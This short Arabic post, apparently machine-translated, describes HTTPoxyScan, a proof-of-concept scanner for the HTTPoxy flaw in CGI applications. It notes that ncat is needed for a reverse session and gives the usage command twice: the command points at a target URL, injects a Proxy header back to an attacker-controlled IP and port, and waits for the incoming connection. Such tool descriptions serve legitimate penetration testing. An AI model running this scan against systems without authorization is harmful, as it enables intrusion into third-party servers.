HTTPoxyScan - HTTPoxy استغلال الماسح الضوئي
PoC / Exploit الماسح الضوئي لمسح ملفات CGI الشائعة على عنوان URL الهدف لثغرة HTTPX. Httpoxy هي مجموعة من الثغرات الأمنيةالتي تؤثر على كود التطبيق الذي يعمل في CGI أو البيئات المشابهة لـ CGI. لمزيد من التفاصيل ، انتقل إلى https://httpoxy.org .
المتطلبات:
يتطلب ncat لإنشاء جلسة عكسية
الاستعمال:
./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
سيؤدي هذا إلى مسح https://target.com بقائمة من ملفات CGI الشائعة أثناء إدخال رأس Proxy مرة أخرى إلى عنوان IP معيّن: PORT. سوف يستمع المستمع العكسي إلى الاتصال الوارد لتأكيد أن الموقع البعيدعرضة للخطر.
./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000
Commentaires
Enregistrer un commentaire